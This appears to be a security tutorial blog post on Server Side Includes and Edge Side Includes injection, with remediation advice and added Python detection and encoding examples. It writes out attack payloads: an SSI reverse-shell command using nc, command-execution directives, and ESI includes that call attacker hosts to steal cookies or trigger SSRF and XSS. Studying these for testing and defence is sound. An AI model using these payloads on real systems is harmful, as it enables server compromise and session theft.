Server Side Includes (SSI) & Edge Side Includes (ESI)

Yasmeena Rezk
4 min read · Apr 15, 2024


Directives

In programming, directives are instructions or commands embedded within the code that provide guidance to the compiler or interpreter on how to process the code.

Server-Side Includes (SSI)

SSI is a technology used by web applications to create dynamic content in HTML pages, before or during rendering, by evaluating SSI directives embedded in the page.

SSI is a great way to add small amounts of dynamic content to pages, without doing a lot of extra work.

SSI is typically used to:

  • display the size of a file.
  • display the last-modified date of the current document.
  • include other files and display their content.

Some SSI directives:

<!--#directive param="value" -->

// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

SSI injection

Description:

SSI injection occurs when poorly validated user input becomes part of a response that the server parses for Server-Side Include directives.

Attack scenarios:

Check for file extensions such as .shtml, .shtm or .stm, which indicate pages the server parses for SSI directives.

Note: the vulnerability can also be blind (the directive's output is not reflected in the response).

  • Submit payloads to the target application through its input fields.
  • The web server is vulnerable if it parses and executes the directives before rendering the page.

Impact:

Can lead to extracting sensitive information from local files or even executing commands on the target web server.

Test plan: inject some SSI directives:

  • Date:
<!--#echo var="DATE_LOCAL" -->
Result: the server's local date is rendered in the response.
  • Executing commands, such as getting the current directory path:
<!--#exec cmd="pwd" -->
Result: the working directory path is rendered in the response.

Remediation

Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted.
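As an added example (not code from the original post), the Python below shows the remediation above in practice: an allowlist check, the short-alphanumeric fallback, HTML-encoding of untrusted text before it is written into an SSI-parsed page, and a small detector that flags SSI directive syntax in request data or logs. The guestbook field, the allowlisted theme names and the sample input are constructed for this example.

```python
import html
import re

# Matches the start of an SSI directive: "<!--#" followed by a directive name.
# Constructed for this example; it covers the directives shown above
# (echo, include, exec, flastmod, printenv, set) and any other name, and
# tolerates stray whitespace so that log review does not miss variants.
SSI_DIRECTIVE_RE = re.compile(r"<!--\s*#\s*([A-Za-z]+)\b", re.IGNORECASE)

# Preferred control: a fixed allowlist of accepted values (constructed).
ALLOWED_THEMES = {"light", "dark", "contrast"}

# Fallback control: short alphanumeric strings only. None of the characters
# an SSI directive needs ('<', '!', '-', '#', quotes, '=') can pass this.
SHORT_ALNUM_RE = re.compile(r"^[A-Za-z0-9]{1,32}$")


def is_allowlisted(value: str, allowed=ALLOWED_THEMES) -> bool:
    """True only if value is exactly one of the accepted values."""
    return value in allowed


def is_short_alnum(value: str) -> bool:
    """True if value is 1-32 ASCII letters or digits and nothing else."""
    return SHORT_ALNUM_RE.fullmatch(value) is not None


def find_ssi_directives(text: str) -> list:
    """Return the directive names found in text (lowercased).

    Intended for request inspection or log review: a hit means someone sent
    SSI syntax into a field, which is worth an alert even if the page is safe.
    """
    return [m.group(1).lower() for m in SSI_DIRECTIVE_RE.finditer(text)]


def render_guestbook_entry(user_text: str) -> str:
    """Encode untrusted text before it is stored in an .shtml page.

    html.escape turns '<' into '&lt;' (and '"' into '&quot;'), so the SSI
    parser never sees the literal '<!--#' sequence that begins a directive.
    """
    return "<li>" + html.escape(user_text, quote=True) + "</li>"


if __name__ == "__main__":
    # Constructed sample input: the 'pwd' test payload from the test plan above.
    untrusted = '<!--#exec cmd="pwd" -->'
    print("directives seen:", find_ssi_directives(untrusted))   # ['exec']
    print("allowlisted:", is_allowlisted(untrusted))             # False
    print("short alnum:", is_short_alnum(untrusted))             # False
    print("encoded:", render_guestbook_entry(untrusted))
```

Encoding works because the server only recognises a directive that begins with the literal characters `<!--#`; once `<` is written as `&lt;` the text is inert. On Apache httpd, `Options IncludesNOEXEC` additionally disables the `#exec` directive while leaving the others available, which limits the impact of any directive that does slip through.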

Edge Side Includes (ESI)

ESI is an XML-based, tag-based markup language that reduces load on the origin server by letting caching proxies cache large amounts of web content; it is mainly used in popular HTTP proxy solutions.

  • An ESI tag instructs the reverse proxy (caching server) to fetch additional content for the cached page template.
  • ESI allows dynamic web content to be assembled at the edge of the network (a Content Delivery Network, the user's browser, or a reverse proxy).

The syntax of ESI in an example:

<body>
<b>The Weather Website</b>
Weather for <esi:include src="/weather/name?id=$(QUERY_STRING{city_id})" />
Monday: <esi:include src="/weather/week/monday?id=$(QUERY_STRING{city_id})" />
Tuesday: <esi:include src="/weather/week/tuesday?id=$(QUERY_STRING{city_id})" />
[…]

ESI Injection

Description:

The root cause of this vulnerability is that HTTP surrogates cannot validate the origin of an ESI tag.

  • ESI injection occurs when an attacker manages to reflect malicious ESI tags in the HTTP response.

Attack scenarios:

  • Inspect response headers for Surrogate-Control: content="ESI/1.0".
  • Introduce ESI tags into HTTP requests to see whether an intermediary proxy parses them and whether ESI injection is possible.

Note: this injection can also be blind.

A blind exploitation approach:

// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>

1. Server-Side Request Forgery (SSRF)

<esi:include src="http://evil.com/ping/" />

If you can get an HTTP callback, then there is ESI injection in this proxy server.

2. SSRF-to-XSS attack using an ESI include

<esi:include src=http://attacker.com/xss.html>

  • When esi:include is available, it can be pointed at external domains, so an external page carrying an XSS payload can simply be included.
  • The content of the xss.html page is fetched via SSRF and then inserted into the DOM of the returned page, causing XSS.

GoSecure created a table summarising the attacks that can be attempted against different ESI-capable software, depending on the ESI functionality each supports.

Remediation

Apply context-dependent encoding and/or validation to user input rendered on a page. Mitigation techniques against XSS recommended for the language or framework you are using will often be enough to protect against ESI injections.
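As an added example that is not part of the original post, the Python below turns the two checks described in this article (the Surrogate-Control header and ESI markup reflected in a response) into a defensive test an application can run against its own responses, alongside the encoding fix recommended above. The origin response, the search-banner template and the input string are constructed for this example.

```python
import html
import re

# ESI markup worth flagging in a response body: an <esi:...> tag, or the
# "<!--esi" comment wrapper that an ESI-capable surrogate strips and processes.
ESI_TAG_RE = re.compile(r"<esi:([a-z]+)\b[^>]*>|<!--esi\b", re.IGNORECASE)

# Constructed input: the kind of string a tester would type into a search box.
# It only points at a local path and is never sent anywhere by this script.
SAMPLE_INPUT = '<esi:include src="/x"/>'


def build_response(body: str, esi_header: bool = True) -> str:
    """Constructed origin response. Surrogate-Control is the header that
    tells an HTTP surrogate (caching proxy) to process ESI in this body."""
    headers = ["HTTP/1.1 200 OK", "Content-Type: text/html"]
    if esi_header:
        headers.append('Surrogate-Control: content="ESI/1.0"')
    return "\r\n".join(headers) + "\r\n\r\n" + body


def parse_http_response(raw: str):
    """Split a raw HTTP/1.1 response into (headers dict, body).
    Header names are lowercased; the status line is skipped."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def esi_findings(raw_response: str, user_input: str) -> dict:
    """Report the three conditions that together make ESI injection likely:
    the response is marked for ESI processing, ESI markup is present in the
    body, and the user's raw input came back unencoded."""
    headers, body = parse_http_response(raw_response)
    surrogate = headers.get("surrogate-control", "")
    return {
        "esi_advertised": "esi/1.0" in surrogate.lower(),
        "esi_tags_in_body": [
            (m.group(1) or "esi-comment").lower() for m in ESI_TAG_RE.finditer(body)
        ],
        "input_reflected_unencoded": bool(user_input) and user_input in body,
    }


def render_search_banner_unsafe(term: str) -> str:
    """Weak version: reflects the search term as-is into the HTML template."""
    return "<p>Results for: " + term + "</p>"


def render_search_banner_safe(term: str) -> str:
    """Corrected version: HTML-encodes the term, so '<esi:' becomes '&lt;esi:'
    and neither the surrogate nor the browser sees a tag."""
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


if __name__ == "__main__":
    for render in (render_search_banner_unsafe, render_search_banner_safe):
        response = build_response(render(SAMPLE_INPUT))
        print(render.__name__, esi_findings(response, SAMPLE_INPUT))
```

The same XSS-style output encoding that neutralises `<script>` also neutralises `<esi:include>`, which is why the remediation above says XSS mitigations are usually sufficient; the scanner is there so that a regression (a new template that reflects raw input) is caught in tests or in a response-inspection hook rather than by a pentester.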
